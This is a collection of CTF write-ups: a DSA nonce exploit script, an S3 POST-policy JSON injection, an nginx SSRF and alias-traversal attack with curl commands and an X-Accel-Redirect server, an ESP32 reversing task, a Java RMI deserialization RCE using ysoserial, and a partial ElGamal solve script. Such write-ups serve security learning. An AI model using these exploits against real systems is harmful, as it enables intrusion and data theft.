 38 |         self.gen = 0x44120dc98545c6d3d81bfc7898983e7b7f6ac8e08d3943af0be7f5d52264abb3775a905e003151ed0631376165b65c8ef72d0b6880da7e4b5e7b833377bb50fde65846426a5bfdc182673b6b2504ebfe0d6bca36338b3a3be334689c1afb17869baeb2b0380351b61555df31f0cda3445bba4023be72a494588d640a9da7bd16L
 39 |         self.q = 0x926c99d24bd4d5b47adb75bd9933de8be5932f4bL
 40 |         self.p = 0x80000000000001cda6f403d8a752a4e7976173ebfcd2acf69a29f4bada1ca3178b56131c2c1f00cf7875a2e7c497b10fea66b26436e40b7b73952081319e26603810a558f871d6d256fddbec5933b77fa7d1d0d75267dcae1f24ea7cc57b3a30f8ea09310772440f016c13e08b56b1196a687d6a5e5de864068f3fd936a361c5L
 41 |         self.key = int(FLAG.encode("hex"), 16)
 42 | 
 43 |     def sign(self, m):
 44 | 
 45 |         def bytes_to_long(b):
 46 |             return long(b.encode("hex"), 16)
 47 | 
 48 |         h = bytes_to_long(sha1(m).digest())
 49 |         u = bytes_to_long(Random.new().read(20))
 50 |         assert(bytes_to_long(m) % (self.q - 1) != 0)
 51 | 
 52 |         k = pow(self.gen, u * bytes_to_long(m), self.q)
 53 |         r = pow(self.gen, k, self.p) % self.q
 54 |         s = pow(k, self.q - 2, self.q) * (h + self.key * r) % self.q
 55 |         assert(s != 0)
 56 | 
 57 |         return r, s
 58 | ```
 59 | 
 60 | ## Solution
 61 | 
 62 | Already hinted at by the challenge name, the used algorithm is very similar to [DSA](https://en.wikipedia.org/wiki/Digital_Signature_Algorithm). The only 'difference' is the generation of the supposedly random number `k`. The calculation of `s` is a tiny bit obfuscated, but using fermats little theorem we can see that it is the normal DSA calculation:
 63 | ```
 64 | pow(k, self.q - 2, self.q) == k ^ -1 mod q
 65 | ```
 66 | 
 67 | 
 68 | The secret-key is the wanted flag. 
 69 | 
 70 | DSA is only secure if k is actually random. If we know what it is, we can compute the key given just a signature and plaintext/hash. Now what do we know about `k`? It gets 'seeded' by 20 random bytes `u`. But on these bytes, a computation is made:
 71 | ```
 72 | k = pow(self.gen, u * bytes_to_long(m), self.q)
 73 | which is essentially
 74 | k = gen^(u*m) mod q, where gen is a generator of the mod-q field and u the 20 random bytes
 75 | ```
 76 | Using fermats little theorem again, we know that
 77 | ```
 78 | gen^(p-1) mod p === 1
 79 | and thus also
 80 | gen^(u*(p-1)) mod p === 1
 81 | ```
 82 | If we could force `m` to be a multiple of `q-1`, which is trivial since we control the input, k is known to be 1!
 83 | 
 84 | Unfortunately, the challenge tries to blocks us by checking this explicitly:
 85 | ```
 86 | assert(bytes_to_long(m) % (self.q - 1) != 0)
 87 | ```
 88 | But this is entirely unsuccessful, since we can just pick `m=(p-1)/2`. Assuming `u` is even, which is often the case, we again have a multiple of `p-1` in the exponent, and thus `k=1`. Now we only need to break DSA with known k.
 89 | 
 90 | A bit of algebra on the DSA computations assuming k=1 gives us
 91 | ```
 92 | k = 1
 93 | r = g^k mod q = g mod q
 94 | s = k^-1 * (h+r*key) mod q
 95 | s = 1    * (h+g*key) mod q
 96 | key = (s-h) * gen^-1 mod q
 97 | ```
 98 | 
 99 | When trying to send the message to the server, we noticed that the server decodes the input as base64, which makes the attack easier since we don't have to worry about null bytes or newlines in the message.
100 | 
101 | Exploit Script:
102 | ```python
103 | from pwn import *
104 | from Crypto.Util.number import long_to_bytes, bytes_to_long, inverse
105 | from hashlib import sha1
106 | 
107 | gen = 0x44120dc98545c6d3d81bfc7898983e7b7f6ac8e08d3943af0be7f5d52264abb3775a905e003151ed0631376165b65c8ef72d0b6880da7e4b5e7b833377bb50fde65846426a5bfdc182673b6b2504ebfe0d6bca36338b3a3be334689c1afb17869baeb2b0380351b61555df31f0cda3445bba4023be72a494588d640a9da7bd16L
108 | q = 0x926c99d24bd4d5b47adb75bd9933de8be5932f4bL
109 | p = 0x80000000000001cda6f403d8a752a4e7976173ebfcd2acf69a29f4bada1ca3178b56131c2c1f00cf7875a2e7c497b10fea66b26436e40b7b73952081319e26603810a558f871d6d256fddbec5933b77fa7d1d0d75267dcae1f24ea7cc57b3a30f8ea09310772440f016c13e08b56b1196a687d6a5e5de864068f3fd936a361c5L
110 | 
111 | m_int = (q-1)/2
112 | m = long_to_bytes(m_int)
113 | h = bytes_to_long(sha1(m).digest())
114 | 
115 | # let the server sign our crafted message
116 | with remote('ezdsa-01.play.midnightsunctf.se', 31337) as r:
117 |     r.sendafter("Options:", "1\n")
118 |     r.sendafter("data:", m.encode('base64')+"\n")
119 |     data = r.recvline_contains(("("))
120 | 
121 | r,s = [int(x[:-1]) for x in data.strip()[1:-1].split(",")]
122 | key = (s-h) * inverse(gen, q) % q
123 | 
124 | print long_to_bytes(key)
125 | ```
126 | Which gives us the flag as 
127 | ```
128 | th4t_w4s_e4sy_eh?
129 | ```


--------------------------------------------------------------------------------
/2019/midnightsunctf/cloudb/cloudb.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["web"]
 3 | author: "LinHe"
 4 | ---
 5 | # Challenge
 6 | > These guys made a DB in the cloud. Hope it's not a rain cloud...  
 7 | > Service: [http://cloudb-01.play.midnightsunctf.se](http://cloudb-01.play.midnightsunctf.se)
 8 | 
 9 | When visiting the website, we can click on "Demo" to create a new account. There is also an admin login.  
10 | We first checked if we could perform SQL injections, but that didn't work.
11 | 
12 | # Solution
13 | When creating a new account, a request is made to `http://cloudb-01.play.midnightsunctf.se/userinfo/<email>/info.json`.  
14 | The result is a JSON file, containing the intersting key `admin` which is set to `false`.  
15 | Obviously, the goal is to change this to `true`.  
16 | 
17 | # Becoming admin
18 | After creating an account (or logging in), we are given the option to edit our account. The interesting part here is that we can upload a new profile picture.  
19 | When uploading the picture, a request is made to `http://cloudb-01.play.midnightsunctf.se/signature` with to parameters: acl and hmac.  
20 | The response is an Amazon S3 POST policy and a signature. The policy and signature are then used to upload the picture to an S3 bucket.  
21 | The policy looks like this:
22 | ```JavaScript
23 | {
24 |     'expiration': '2019-04-08T17:06:05.000Z',
25 |     'conditions': [
26 |       ['content-length-range', 1, 10000],
27 |       {'bucket': 'cloudb-profilepics'},
28 |       {'acl': 'public-read'},
29 |       ['starts-with', '$key', 'profilepics/']
30 |     ]
31 | }
32 | ```
33 | 
34 | It looks like the acl parameter is directly inserted into the JSON.  
35 | When changing the acl parameter, the hmac becomes invalid so we needed to find out how to create our own hmac's.  
36 | We found the relevant code in the website's JavaScript:
37 | ```JavaScript
38 | app = {
39 |   hmac: function(b, e) {
40 |     return CryptoJS.HmacSHA256(b+e, this.secret+"").toString(CryptoJS.enc.Hex)
41 |   },
42 |   secret: {secret: "cl0udb_Pr0d_Do_NOT_d1sclose"},
43 |   // ...
44 | }
45 | ```
46 | To create the correct hmac for our acl, we had to call app.hmac(acl_data, "").  
47 | When implementing this in Python, I first only got wrong hmacs.  
48 | This is because I used `cl0udb_Pr0d_Do_NOT_d1sclose` as key.  
49 | However, after looking at the JavaScript code again, I noticed that they use `app.secret+""` as the key.  
50 | Because of the way how JavaScript works, this results in `[object Object]` being the key...  
51 | 
52 | Now that we were able to create correct hmacs, we tried to change acl to `'}`, which resulted in the JSON looking like this:
53 | ```JavaScript
54 | {
55 |     'expiration': '2019-04-08T17:06:05.000Z',
56 |     'conditions': [
57 |       ['content-length-range', 1, 10000],
58 |       {'bucket': ''}'},
59 |       {'acl': 'public-read'},
60 |       ['starts-with', '$key', 'profilepics/']
61 |     ]
62 | }
63 | ```
64 | We now knew that the acl parameter is directly inserted into the JSON without any checks.  
65 | The Plan now was to change the conditions so that we could write anywhere on the bucket, not just to profilepics.  
66 | This wasn't easy as we needed to get rid of the `starts-with` condition and Amazon only allowed the keys `expiration` and `conditions` and creating a second `conditions` key would cause Amazon to ignore the first one.  
67 | After some time we found out that if there were two keys, one named `conditions` and the other one named `Conditions` (notice the capital 'C'), Amazon would ignore the `Conditions` key and only use the `conditions` key.  
68 | We tried to upload our updated user JSON file to `userinfo/<email>/info.json`, then went to the admin page, logged in and ... we still got `You are not admin!` Something obviously didn't work.  
69 | After downloading our info.json from `http://cloudb-01.play.midnightsunctf.se/userinfo/<email>/info.json`, we noticed that it still had admin set to `false`.  
70 | We then created a new account and then tried to download it's info.json directly from the S3 bucket. However, it wasn't there.  
71 | Then we noticed that the name of the bucket was `cloudb-profilepics`. After a few tries we found out that there is another bucket named `cloudb-users` which had a users directory. We found out that the `info.json` for each user was stored in `users/<email>/info.json`.  
72 | We now had to change the JSON policy to allow us to write into the `cloudb-users` bucket. To do this, we used `public-read-write'}],'conditions': [['starts-with', '$bucket', ''],['starts-with', '$key', ''],{'acl': 'public-read-write'}],'Conditions': [{'acl': 'public-read-write` as acl, resulting in the following policy:
73 | ```JavaScript
74 | {
75 |   'expiration': '2019-04-08T17:45:19.000Z',
76 |   'conditions': [
77 |     ['content-length-range', 1, 10000],
78 |     {'bucket': 'cloudb-profilepics'},
79 |     {'acl': 'public-read-write'}
80 |   ],
81 |   'conditions': [
82 |     ['starts-with', '$bucket', ''],
83 |     ['starts-with', '$key', ''],
84 |     {'acl': 'public-read-write'}
85 |   ],
86 |   'Conditions': [
87 |     {'acl': 'public-read-write'},
88 |     ['starts-with', '$key', 'profilepics/']
89 |   ]
90 | }
91 | ```
92 | Amzon would use the second `conditions` key which allows us to write to any file in any bucket that the signer has access to.  
93 | Additionally, the `Conditions` key would be ignored.  
94 | This allowed us to upload a new info.json with `admin` set to `true`.  
95 | After logging in as admin, we got the flag: `midnight{n3x7_t1m3_w3ll_d0_1t_Cl0udl3sslY}`
96 | 
97 | See exploit.py for the full exploit.
98 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/bigspin/bigspin.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | tags: ["web", "traversal", "nginx", "ssrf", "prox"]
  3 | author: "bennofs"
  4 | ---
  5 | # Challenge
  6 | > This app got hacked due to admin and uberadmin directories being open. Was just about to wget -r it, but then they fixed it :( Can you help me get the files again?
  7 | 
  8 | When visiting the site, it just displays a simple sentence:
  9 | 
 10 | > What's it gonna be? Are you an uberadmin, an admin, a user, or (most likely) just a pleb? 
 11 | 
 12 | where uberadmin, admin, user and pleb are links:
 13 | 
 14 | - `/uberadmin` gives 403 (nginx)
 15 | - `/admin` is 404 (nginx)
 16 | - `/user` is also 403 (nginx)
 17 | - `/pleb` displays the contents of https://example.org
 18 | 
 19 | # Solution
 20 | 
 21 | After playing around a little bit, we discover that all paths beginning with `/uberadmin` or `/user` are disallowed. Interestingly, `/userSOME_SUFFIX` is also blocked. This suggests that the nginx config uses `location` without trailing slash, so https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md may be applicable.
 22 | Also, `http://bigspin-01.play.midnightsunctf.se:3123/plebSOME_SUFFIX` results in `502 Bad Gateway` so the server is likely using `example.org` as upstream and just proxies `/pleb` there.
 23 | 
 24 | A quick test with `http://bigspin-01.play.midnightsunctf.se:3123/pleb.mydomain.com` confirms this theory, as DNS requests to `example.com.mydomain.com` show up in logs. We can list the contents of the user directory with [localtest.me](https://readme.localtest.me): http://bigspin-01.play.midnightsunctf.se:3123/pleb.localtest.me/user/. This reveals that `/user/nginx.cönf` exists, which can be obtained via double URL encoding (due to the proxying):
 25 | 
 26 | ```nginx
 27 | $ curl 'http://bigspin-01.play.midnightsunctf.se:3123/pleb.localtest.me/user/nginx.c%25C3%25B6nf%2520'
 28 | worker_processes 1;
 29 | user nobody nobody;
 30 | error_log /dev/stdout;
 31 | pid /tmp/nginx.pid;
 32 | events {
 33 |   worker_connections 1024;
 34 | }
 35 | 
 36 | http {
 37 | 
 38 |     # Set an array of temp and cache files options that otherwise defaults to
 39 |     # restricted locations accessible only to root.
 40 | 
 41 |     client_body_temp_path /tmp/client_body;
 42 |     fastcgi_temp_path /tmp/fastcgi_temp;
 43 |     proxy_temp_path /tmp/proxy_temp;
 44 |     scgi_temp_path /tmp/scgi_temp;
 45 |     uwsgi_temp_path /tmp/uwsgi_temp;
 46 |     resolver 8.8.8.8 ipv6=off;
 47 | 
 48 |     server {
 49 |         listen 80;
 50 | 
 51 |         location / {
 52 |             root /var/www/html/public;
 53 |             try_files $uri $uri/index.html $uri/ =404;
 54 |         }
 55 | 
 56 |         location /user {
 57 |             allow 127.0.0.1;
 58 |             deny all;
 59 |             autoindex on;
 60 |             root /var/www/html/;
 61 |         }
 62 | 
 63 |         location /admin {
 64 |             internal;
 65 |             autoindex on;
 66 |             alias /var/www/html/admin/;
 67 |         }
 68 | 
 69 |         location /uberadmin {
 70 |             allow 0.13.3.7;
 71 |             deny all;
 72 |             autoindex on;
 73 |             alias /var/www/html/uberadmin/;
 74 |         }
 75 | 
 76 |         location ~ /pleb([/a-zA-Z0-9.:%]+) {
 77 |             proxy_pass   http://example.com$1;
 78 |         }
 79 | 
 80 |         access_log /dev/stdout;
 81 |         error_log /dev/stdout;
 82 |     }
 83 | 
 84 | }
 85 | ```
 86 | We now see that `/admin` is marked as `internal`. Quoting the [nginx docs](http://nginx.org/en/docs/http/ngx_http_core_module.html#internal):
 87 | 
 88 | >  Specifies that a given location can only be used for internal requests. For external requests, the client error 404 (Not Found) is returned. Internal requests are the following:
 89 | >
 90 | > - requests redirected by the error_page, index, random_index, and try_files directives;
 91 | > -  requests **redirected by the “X-Accel-Redirect”** response header field from an upstream server;
 92 | > -  subrequests formed by the “include virtual” command of the ngx_http_ssi_module module, by the ngx_http_addition_module module directives, and by auth_request and mirror directives;
 93 | > - requests changed by the rewrite directive.
 94 | 
 95 | To access that, we write a trivial python server that sets `X-Accel-Redirect`:
 96 | 
 97 | ```python
 98 | import os
 99 | from flask import Flask,redirect,make_response
100 | 
101 | app = Flask(__name__)
102 | 
103 | @app.route('/<path:rest>')
104 | def hello(rest):
105 |     r = make_response()
106 |     print(rest)
107 |     r.headers.set("X-Accel-Redirect", '/' + rest)
108 |     return r
109 | 
110 | if __name__ == '__main__':
111 |     # Bind to PORT if defined, otherwise default to 5000.
112 |     port = int(os.environ.get('PORT', 80))
113 |     app.run(host='0.0.0.0', port=port)
114 | ```
115 | 
116 | So we access admin, and then use nginx path traversal (this time possible because the `/admin` location uses `alias` instead of `root`) to read the flag from uberadmin:
117 | 
118 | ```
119 | $ curl http://bigspin-01.play.midnightsunctf.se:3123/pleb.ctfip.ddnss.ch/admin/flag.txt
120 | hmmm, should admins really get flags? seems like an uberadmin thing to me
121 | 
122 | $ curl http://bigspin-01.play.midnightsunctf.se:3123/pleb.ctfip.ddnss.ch/admin../uberadmin/flag.txt
123 | midnight{y0u_sp1n_m3_r1ght_r0und_b@by}
124 | ```
125 | 
126 | 
127 | # References
128 | 
129 | - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf mentions this and lots of other interesting path issues as well
130 | 


--------------------------------------------------------------------------------
/2020/twctf/apple/writeup.md:
--------------------------------------------------------------------------------
  1 | # Apple
  2 | Category: Reverse
  3 | 
  4 | Solves: 1, Score: 500
  5 | 
  6 | > Clarification and hint:
  7 | > There's no problem found in the binary. I've confirmed it accepts the correct flag. Try out a special case.
  8 | 
  9 | Attached: [apple.tar.gz](https://github.com/6f70/twctf2020-apple/blob/public/apple.tar.gz)
 10 | 
 11 | 
 12 | ## Solution
 13 | This was a really nice hardware reversing challenge, based on the ESP32. We were given a 4MB flash image of an ESP32, and a custom version of QEMU capable of running the image. It is a basic crack-me, you input a flag and it tells you if it is correct or wrong via some internal algorithm. The goal is to reverse this algorithm.
 14 | 
 15 | 
 16 | Luckily my team-member 0x4d5a recently created his own [challenge](https://github.com/allesctf/2020/tree/master/challenges/especially-a-lot-of-fun/public) based on this board, which I test-solved, so I already had all necessary tools ready.
 17 | 
 18 | These are mainly ghidra extensions provided by @ebiroll, which allow loading, disassembling and even decompiling of xtensa binaries in ghirda: https://github.com/Ebiroll/ghidra-xtensa and https://github.com/Ebiroll/esp32_flash_loader
 19 | 
 20 | In addition, I already had a Function-ID database which was able to tag some functions in the binary, and a custom script which greedily marked all `entry` instructions as function entries. Without this, ghidra struggled to create appropriate function definitions. This is problematic, since x-refs did not work correctly.
 21 | 
 22 | The procedure of creating a good ghidra database is:
 23 | 1. use the @ebiroll's loader to load the binary at the correct offset
 24 | 2. DO NOT use autoanalysis yet
 25 | 3. run the custom function tagger
 26 | 4. run auto-analysis
 27 | 5. go to strings, search for "Wrong.", the output seen when entering a wrong flag, and look at xrefs.
 28 | 6. this directly lists the function where the checksum is calculated and compared. The decompiler works somewhat, but does not recognize some loops.
 29 | 7. reimplement checksum in python
 30 | 
 31 | ### Checksum
 32 | The checksum is based on a 16 byte state, consisting of 4x4byte integers. These are initially seeded with the input, mangled a lot, and finally compared to a hardcoded value.
 33 | It consists of 5 rounds, each run 4 times in a row. The round-functions are contained in a function-lookup table.
 34 | 
 35 | In the decompiler we see:
 36 | ```
 37 | ## checksum 1
 38 |   local_30 = (param_1[1] + 1) * *param_1;
 39 |   iStack44 = (param_1[2] + 1) * param_1[1];
 40 |   iStack40 = (param_1[3] + 1) * param_1[2];
 41 |   iStack36 = (*param_1 + 1) * param_1[3];
 42 |  
 43 | ## checksum 2
 44 |   *param_1 = *param_1 +     0xEEEC09DC;
 45 |   param_1[1] = param_1[1] + 0x03774ED1;
 46 |   param_1[2] = param_1[2] + 0x0C443FFF;
 47 |   param_1[3] = param_1[3] + 0x9FA8FC57;
 48 | 
 49 | ## checksum 3
 50 |   uVar1 = *param_1;
 51 |   uVar2 = param_1[1];
 52 |   local_30 = uVar1 + uVar1 % uVar2;
 53 |   uVar3 = param_1[2];
 54 |   iStack44 = uVar2 + uVar2 % uVar3;
 55 |   uVar2 = param_1[3];
 56 |   iStack40 = uVar3 + uVar3 % uVar2;
 57 |   iStack36 = uVar2 + uVar2 % uVar1;
 58 |   
 59 | ## checksum 4
 60 |   *param_1 = *param_1 +     0x0426C4E9;
 61 |   param_1[1] = param_1[1] + 0x58918FCD;
 62 |   param_1[2] = param_1[2] + 0xFA86D177;
 63 |   param_1[3] = param_1[3] + 0x6D320FED;
 64 | 
 65 | ## checksum 5
 66 | *param_1 = *param_1 ^       0x44D3E8D9;
 67 |   param_1[1] = param_1[1] ^ 0x47592C79;
 68 |   param_1[2] = param_1[2] ^ 0xEEBCD1C8;
 69 |   param_1[3] = param_1[3] ^ 0xF4C4E2F8;
 70 | 
 71 | ## final comparison against
 72 |     0x5935F1DE
 73 |     0xB63725E7
 74 |     0xDFA10069
 75 |     0x4E556F64
 76 | ```
 77 | 
 78 | Further, we can also see that the input is restricted to exactly 16 characters, and only chars 0x20 to 0x7e.
 79 | 
 80 | I implemented each checksum stage individually, checking with QEMU against the real solution for validity. After some tweaking I had the exact same output on all inputs I tried. Using Boolector, the checksum was trivial to reverse, though not always uniqely. Only one input refused to be reversed: The actual flag. This confused me for a while, and I ran a script in the background trying out random inputs. Around ten thousand tries later, still everything matched, and I worked on another challenge a bit.
 81 | 
 82 | Later the autor confirmed that the challenge is working as intended, and a special case should be considered. I opened the xtensa-processor manual and looked at the documentation for each opcode used in the checksum. By doing this I quickly found the issue: The modulo operation. This is done internally with an division, so it can create a Integer Divide By Zero exception. This case is so rare, it should basically never happen, but the constants used in the challenge were chosen specifically so that it occurs. Normally, such an error will crash the program. But the challenge author hooked this exception, and continued execution normally.
 83 | 
 84 | This hypothesis was tested with QEMU. The mod register was set to zero, and various values for the operand tried out. This quickly revealed, that it was being squared:
 85 | ```
 86 | 0 % 0 == 0
 87 | 1 % 0 == 1
 88 | 2 % 0 == 4
 89 | 3 % 0 == 9
 90 | 100 % 0 == 10000
 91 | 0x1000000 % 0 == 0
 92 | ```
 93 | 
 94 | Using this slight modification, my reversing script also worked for the flag. It is attached in [solve.py](./solve.py).
 95 | 
 96 | I really liked that a qemu version was provided prebuild, so there was no advantage for people with access to real hardware! All in all, great challenge :)
 97 | 
 98 | 
 99 | ### Flag
100 | `TWCTF{Rin9oWoT@berun9o}`


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/README.md:
--------------------------------------------------------------------------------
 1 | # RMI
 2 | 
 3 | During the Real World CTF Finals 2018 I took a short look at the RMI challenge. Not knowing a straight approach I moved on to the camera challenge, which also was solved 	eventually a few days after the finals. Yesterday I gave the RMI challenge another try and solved in basically no time. To be fair: Another team hinted that there was a Chinese blog article include much information and even half of an PoC for this challenge.
 4 | 
 5 | But step by step: RMI (Remote Method Invocation) is a Java feature to implement RPCs  (Remote Procedure Calls). Basically the RMI exposes some endpoints and a remote client can use the endpoint like in a local application. Since the RMI uses Java Object Serialization to transfer the objects between the server and client the protocol vulnerable to the well known Object Injection Exploits (see <a href="https://github.com/frohoff/ysoserial" target="_blank">ysoserial</a> for reference). If certain gadgets are present in the Java class path libraries, special crafted objects can trigger a RCE once they get deserialized.
 6 | 
 7 | The RMI challenge had quite a simple setup: Use the most recent JRE version (8u191) to exploit the provided RMI. Given was a JAR file that hosts a RMI server at port 1099. The RMI endpoint was a "Hello World" stub with the simplest imaginable implementation (and acutally not needed at all):
 8 | 
 9 |     public abstract interface RemoteHello extends Remote
10 |     {
11 |         public abstract String sayHello() throws RemoteException;
12 |     }
13 | 
14 |     public class RemoteHelloImpl implements RemoteHello
15 |     {
16 |       public String sayHello() throws RemoteException
17 |       {
18 |         return "Hello, real world ctfer.";
19 |       }
20 |     }
21 |     
22 | The above mentioned RCE gadgets were also present in the JAR as revealed in the META-INF of the file:
23 | ![](CommonsCollections.PNG)
24 | 
25 | The Apache Commons Collections are the most used library to gain RCE via a deserialization vulnerability. And it was even a old, unfixed version 3.2.1 of the library! The usual way to exploit this RMI is a one-liner:
26 | 
27 | `java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 1099 CommonsCollections5 gnome-calculator`
28 | 
29 | This command creates an RMI client and sends the CommonsCollections5 RCE object payload to the RMI server, triggering the "gnome-calculator" command once its processed by the RMI. Or at least it would in an older JRE version. Starting with JRE 8u121 an "<a href="https://github.com/JetBrains/jdk8u_jdk/blob/master/src/share/classes/sun/rmi/registry/RegistryImpl.java" target="_blank">RMI RegistryFilter</a>" was included.
30 | 
31 |     If (String.class == clazz
32 |                         || java.lang.Number.class.isAssignableFrom(clazz)
33 |                         || Remote.class.isAssignableFrom(clazz)
34 |                         || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
35 |                         || UnicastRef.class.isAssignableFrom(clazz)
36 |                         || RMIClientSocketFactory.class.isAssignableFrom(clazz)
37 |                         || RMIServerSocketFactory.class.isAssignableFrom(clazz)
38 |                         || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
39 |                         || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
40 |                     return ObjectInputFilter.Status.ALLOWED;
41 |                 } else {
42 |                     return ObjectInputFilter.Status.REJECTED;
43 |                 }
44 |                 
45 | ![](Rejected.png)
46 | 
47 | The RMI Objects are reduced to only a few classes, rejecting the "AnnotationInvocationHandler" used by the RCE gadget as seen in the screenshot.
48 | 
49 | Long story short: I finally found the mentioned <a href="http://www.codersec.net/2018/09/%E4%B8%80%E6%AC%A1%E6%94%BB%E5%87%BB%E5%86%85%E7%BD%91rmi%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%B7%B1%E6%80%9D/" target="_blank">chinese blog article</a> about bypassing the RMI on page 5 on the google results. 
50 | 
51 | *(I don't have deep knowledge of Java internalGooglethe following few sentences are very vague and might be even wrong)* The PoC in the blog article uses the `UnicastRef` class. The Java RMI provides a distributed garbage collection among clients. The object refs are tracked by the `LiveRef` class, storing the `objectId` along with a tcp endpoint of the destributed GC. This `LiveRef` can be wrapped in a `UnicastRef` object allowed by the registryFilter! Once the object gets garbage collected, the remote garbage collector is notified and returns a serialized BadAttributeValueExpException to the RMI which contains the RCE payload. This serialized object is not checked by the registryFilter, yielding the RCE we wanted to achieve. 
52 | 
53 | The author of the chinese blog article provides in total four methods to bypass the filter, this way seemed the easiest. The other ways make essentially the same, but using proxy methods and dynamic invokes on the wrapped UnicastRef object.
54 | 
55 | Fortunatly the malicious remote GC listener is <a href="https://giFortunatelyrohoff/ysoserial/blob/master/src/main/java/ysoserial/exploit/JRMPListener.java" target="_blank">already implemented</a> in ysoserial . So all we need to do is:
56 | 
57 | 1. Start a JRMP Listener
58 | 2. Arm the listener with the CommonsCollections 3.2.1 payload
59 | 3. Create a UnicastRef Object with a LiveRef to the remote GC
60 | 4. Register the UnicastRef Object at the RMI
61 | 5. Profit
62 | 
63 | ![](PoC.PNG)
64 | 
65 | Commented <a href="Main.java" target="_blank">sourcecode</a> attached. I'd highly appreciate it if someone corrects me on the whole remote GC and JRMP stuff. Unfortunatly I couldn't find information except for the raw java sources.


--------------------------------------------------------------------------------
/2020/twctf/the_melancholy_of_alice/solve.py:
--------------------------------------------------------------------------------
  1 | import string
  2 | import math
  3 | from itertools import chain, combinations
  4 | 
  5 | # parameters from publickey.txt
  6 | p = 168144747387516592781620466787069575171940752179672411574452734808497653671359884981272746489813635225263167370526619987842319278446075098036112998679570069486935297242638675590736039429506131690941660748942375274820626186241210376537247501823653926524570571499198040207829317830442983944747691656715907048411
  7 | h = 98640592922797107093071054876006959817165651265269454302952482363998333376245900760045606011965672215605936345612030149799453733708430421685495677502147392514542499678987737269487279698863617849581626352877756515435930907093553607392143564985566046429416461073375036461770604488387110385404233515192951025299
  8 | g = 2
  9 | 
 10 | # load ciphertexts
 11 | ct = []
 12 | with open("ciphertext.txt") as f:
 13 |     lines = f.readlines()
 14 |     for l in lines:
 15 |         c1,c2 = l[1:-2].split(", ")
 16 |         ct.append((int(c1), int(c2)))
 17 | 
 18 | 
 19 | # all known factors of p-1. Later found: 4588812059915964626441195986601 (but irrelevant, small facs are enough)
 20 | p_1_facs = [2,3,5,19,5710354319, 51658928397640816749496741258372813990722627656855754562391398098921970341107502745503897286522726230109424976175433646991098836185027283530688300614255822120936368467861662197207684132094740490803687878442773882280113279254839084462283459148390201062466564601191314219384110976101430980883391327]
 21 | assert(math.prod(p_1_facs) == p-1)
 22 | p_1_facs_inv = [(p-1) // f for f in p_1_facs]
 23 | 
 24 | 
 25 | # Compute some possible generator orders, by taking out individual factors of p-1
 26 | tests = []
 27 | # we wont find a fac of 5710354319 anyways, so just directly exclude
 28 | # powerset hack from SO
 29 | for f in chain.from_iterable(combinations(p_1_facs[:-2], r) for r in range(len(p_1_facs[:-2])+1)):
 30 |     t = math.prod(f)
 31 |     tests.append(t)
 32 | possible_generators = sorted([(p-1) // t for t in tests])
 33 | 
 34 | # 16 entries, last is p-1, which is guaranteed to be the order, if nothing before was
 35 | print(len(possible_generators))
 36 | 
 37 | # loop through pairs of ciphertexts, ca and cb. Try out possible plaintext pairs and verify against the ciphertext pairs.
 38 | # let ciphertext c = (c1,c2) with
 39 | #   c1 = g**r
 40 | #   c2 = m * g**(r*x)
 41 | # let N be the order of g
 42 | # verification is based on the observation that:
 43 | # c2**n == m**n * g**(r*x*n) == g**n**(r*x) == m**n, because g**n==1, since n is the order
 44 | #
 45 | # unfortunately, g has order p-1 (or just too high and we dont know it, since we cannot factor p completely)
 46 | # this means that m**n == m**(p-1) == 1 as well, so no use
 47 | # BUT: we can 'cheat' and take the order of g**r instead of g.
 48 | # This MIGHT be successful for SOME ciphertexts, but not all.
 49 | # So we take TWO ciphertexts, and combine them. Let f be a "random" factor
 50 | #    c2a*(c2b**f) == ma*mb * g**(x*(ra+f*rb))
 51 | # Now define n to be the order of g**(ra+f*rb).
 52 | # This n can be experimentally determined, by checking with c1:
 53 | #    c1a * c1b**f == g**(ra+f*rb)
 54 | # So test possible values for the generator n, until
 55 | #    (c1a * c1b**f) ** n == 1
 56 | #
 57 | # Now, test possible values for pairs of ma,mb so that
 58 | #    (ma * mb**f) ** n == (c2a * c2b**f) ** n
 59 | #
 60 | # Do this "smart", only for possible values of ma, mb.
 61 | 
 62 | #known = "TWCTF{8d560108444cc360374ef54433d218e9_for_the_first_time_in_9_years!}"
 63 | known = "T"
 64 | cand2 = []
 65 | for i, (ca, cb) in enumerate(zip(ct[:-1], ct[1:])):
 66 | 
 67 |     # STEP 1: 
 68 |     # Compute ca*(cb**f), which results in g**(ra+f*rb)
 69 |     # find best value for f, so that subgroup is as small as possible -> likely that m is not in it
 70 | 
 71 |     #print("Starting", i)
 72 |     bestind = len(possible_generators)
 73 |     bestn = possible_generators[-1]
 74 |     bestmult = 1
 75 | 
 76 |     # try 50 multiples of cb
 77 |     for mult in range(1000):
 78 |         # guess order of the generator with all known possibilities
 79 |         for j, n in enumerate(possible_generators[:bestind]):
 80 |             candidates = []
 81 |             # check order, if 1 its correct
 82 |             res = pow(ca[0]*pow(cb[0], mult, p), n, p)
 83 |             if res == 1:
 84 |                 # found order. see if better.
 85 |                 bestind = j
 86 |                 bestn = n
 87 |                 bestmult = mult
 88 |                 print("Found better index at mult", mult, j, (p-1)//n)
 89 |                 break
 90 | 
 91 |     # STEP 2:
 92 |     # use best generator value, and test possible plaintexts
 93 | 
 94 |     # limit range of possible chars
 95 |     valida = string.printable
 96 |     if len(cand2) >= len(known):
 97 |         valida = set([x[1] for x in cand2[-1]])
 98 |         print("Potentially valid: ", valida)
 99 |     else:
100 |         valida = set([known[i]])
101 |         print("We know previous character to be", known[i])
102 | 
103 |     # loop though plaintext pairs
104 |     candidates = []
105 |     for ma in valida:
106 |         for mb in string.printable:
107 |             # test (ma * mb**f) ** n == (c2a * c2b**f) ** n
108 |             if pow(ord(ma)*(ord(mb)**bestmult), bestn, p) == pow(ca[1]*pow(cb[1], bestmult, p), bestn, p):
109 |                 candidates.append((ma, mb))
110 |                 #print("Add cand", ma, mb)
111 |     
